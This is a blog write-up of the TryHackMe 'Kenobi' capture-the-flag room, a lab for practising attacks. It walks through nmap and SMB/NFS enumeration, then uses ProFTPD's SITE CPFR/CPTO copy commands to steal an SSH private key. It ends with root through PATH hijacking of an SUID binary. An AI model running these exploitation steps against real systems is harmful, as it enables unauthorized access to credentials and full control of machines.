naP0
naP0
Kenobi Writeup - TryHackMe
22
1

Kenobi Writeup - TryHackMe

Welcome to the writeup of Kenobi room from TryHackMe - CTF.

Pedro Mariano
3 min
22
1

Welcome to the writeup of Kenobi room from TryHackMe.

It's another room from a famous franchise (Star Wars), but it's lesss themed than the Biohazard room - here is my Biohazard Walkthrough - so this will be a direct wireteup.

Here we go...

"Description: This room will cover accessing a Samba share, manipulating a vulnerable version of proftpd to gain initial access and escalate your privileges to root via an SUID binary."

IP: 10.10.128.132

Enumeration


          

            sudo nmap -v -sSV -Pn 10.10.128.132 -oN nmap/scan
          
          

            
          
          

            PORT     STATE SERVICE     VERSION
          
          

            21/tcp   open  ftp         ProFTPD 1.3.5
          
          

            22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
          
          

            80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
          
          

            111/tcp  open  rpcbind     2-4 (RPC #100000)
          
          

            139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
          
          

            445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
          
          

            2049/tcp open  nfs_acl     2-3 (RPC #100227)
          
          

            Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Email image

There is some ports that we could identify with NMAP, but we will not stop here with the NMAP... let's use some scripts

Nmap - SMB


          

            sudo nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.128.132 -oN nmap/smb
          
          

            
          
          

            PORT    STATE SERVICE
          
          

            445/tcp open  microsoft-ds
          
          

            
          
          

            Host script results:
          
          

            | smb-enum-shares: 
          
          

            |   account_used: guest
          
          

            |   \\10.10.128.132\IPC$: 
          
          

            |     Type: STYPE_IPC_HIDDEN
          
          

            |     Comment: IPC Service (kenobi server (Samba, Ubuntu))
          
          

            |     Users: 1
          
          

            |     Max Users: <unlimited>
          
          

            |     Path: C:\tmp
          
          

            |     Anonymous access: READ/WRITE
          
          

            |     Current user access: READ/WRITE
          
          

            |   \\10.10.128.132\anonymous: 
          
          

            |     Type: STYPE_DISKTREE
          
          

            |     Comment: 
          
          

            |     Users: 0
          
          

            |     Max Users: <unlimited>
          
          

            |     Path: C:\home\kenobi\share
          
          

            |     Anonymous access: READ/WRITE
          
          

            |     Current user access: READ/WRITE
          
          

            |   \\10.10.128.132\print$: 
          
          

            |     Type: STYPE_DISKTREE
          
          

            |     Comment: Printer Drivers
          
          

            |     Users: 0
          
          

            |     Max Users: <unlimited>
          
          

            |     Path: C:\var\lib\samba\printers
          
          

            |     Anonymous access: <none>
          
          

            |_    Current user access: <none>
          
          

            |_smb-enum-users: ERROR: Script execution failed (use -d to debug)

With "smb-enum" scritps, we could found shares that we can try to access and explore using smbclient.


          

            smbclient //10.10.128.132/anonymous
          
          

            	dir
          
          

            	.                                   D        0  Wed Sep  4 03:49:09 2019
          
          

            	..                                  D        0  Wed Sep  4 03:56:07 2019
          
          

            	log.txt                             N    12237  Wed Sep  4 03:49:09 2019
          
          

            	
          
          

            	get log.txt
          
          

            
          
          

            cat log.txt --> return SSH key

Exploring this "configuration" we got some interesting informations about a SSH key and the FTP server through the log.txt file.

Nmap - RPC


          

            nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.128.132
          
          

            
          
          

            PORT    STATE SERVICE
          
          

            111/tcp open  rpcbind
          
          

            | nfs-ls: Volume /var
          
          

            |   access: Read Lookup NoModify NoExtend NoDelete NoExecute
          
          

            | PERMISSION  UID  GID  SIZE  TIME                 FILENAME
          
          

            | rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  .
          
          

            | rwxr-xr-x   0    0    4096  2019-09-04T12:27:33  ..
          
          

            | rwxr-xr-x   0    0    4096  2019-09-04T12:09:49  backups
          
          

            | rwxr-xr-x   0    0    4096  2019-09-04T10:37:44  cache
          
          

            | rwxrwxrwt   0    0    4096  2019-09-04T08:43:56  crash
          
          

            | rwxrwsr-x   0    50   4096  2016-04-12T20:14:23  local
          
          

            | rwxrwxrwx   0    0    9     2019-09-04T08:41:33  lock
          
          

            | rwxrwxr-x   0    108  4096  2019-09-04T10:37:44  log
          
          

            | rwxr-xr-x   0    0    4096  2019-01-29T23:27:41  snap
          
          

            | rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  www
          
          

            |_
          
          

            | nfs-showmount: 
          
          

            |_  /var *
          
          

            | nfs-statfs: 
          
          

            |   Filesystem  1K-blocks  Used       Available  Use%  Maxfilesize  Maxlink
          
          

            |_  /var        9204224.0  1836524.0  6877104.0  22%   16.0T        32000

With "nfs" scripts, we could enumerate a network file system and now we can try to mount it.

Exploitation

Through the ProFTPd version running on the server we could explore a module using the "SITE CPFR" and "SITE CPTO" commands, which can be used to copy files/directories from one place to another on the server. Using the information existing in log.txt was possible to determine the location of the SSH key and copy it to the mount share.

Email image

          

            nc -v 10.10.128.132 21
          
          

            Connection to 10.10.128.132 21 port [tcp/ftp] succeeded!
          
          

            220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.128.132]
          
          

            	SITE CPFR /home/kenobi/.ssh/id_rsa
          
          

            	350 File or directory exists, ready for destination name
          
          

            	SITE CPTO /var/tmp/id_rsa
          
          

            	250 Copy successful

After explored and copied the SSH key to the file where we have access through the mount, we can mount the share and have a direct access to the key.


          

            mkdir /mnt/kenobiNFS
          
          

            sudo mount 10.10.128.132:/var mnt/kenobiNFS/
          
          

            cd mnt/kenobiNFS/tmp

Now we can log in the server using the SSH key.


          

            sudo chmod 600 id_rsa
          
          

            
          
          

            ssh kenobi@10.10.128.132 -i id_rsa
          
          

            
          
          

            kenobi@kenobi:~$ wc -c user.txt 
          
          

            33 user.txt

With the access in the machine as "Kenobi" user, was possible to found the "user flag".

Privilege Escalation

Checking for misconfigurations to privilege escalation we found the binary /user/bin/menu as SUID, what allows us to use it as root.

find / -perm -u=s -type f 2>/dev/null

Email image

But we need to know how the binary works to exlore it. So, let's run it.

Email image

He appear to call some commands as "curl" and "ifconfig" in the respective options "1" and "3" and running running without a full path (/usr/bin/curl). So we can configure the PATH variable stating a path that we have control to create an "archive" with the same command name called for the script /usr/bin/menu, but with another function/code :D

Example:


          

            cd /tmp
          
          

            echo /bin/sh > curl
          
          

            chmod 777 curl
          
          

            export PATH=/tmp:$PATH
          
          

            /usr/bin/menu

How this binary run as root (SUID), the command "/bin/sh or /bin/bash" (in our file and defined path) will be run as root too... With that, choosing the option referring to the generated file we become root \o/

Email image

Now we have full control of this machine and is possible to read the root flag at /root/root.txt.

Email image

Thanks for reading and feel free to pingback a coffee ;D

naP0

Give a Pingback
Learn
Support
More Options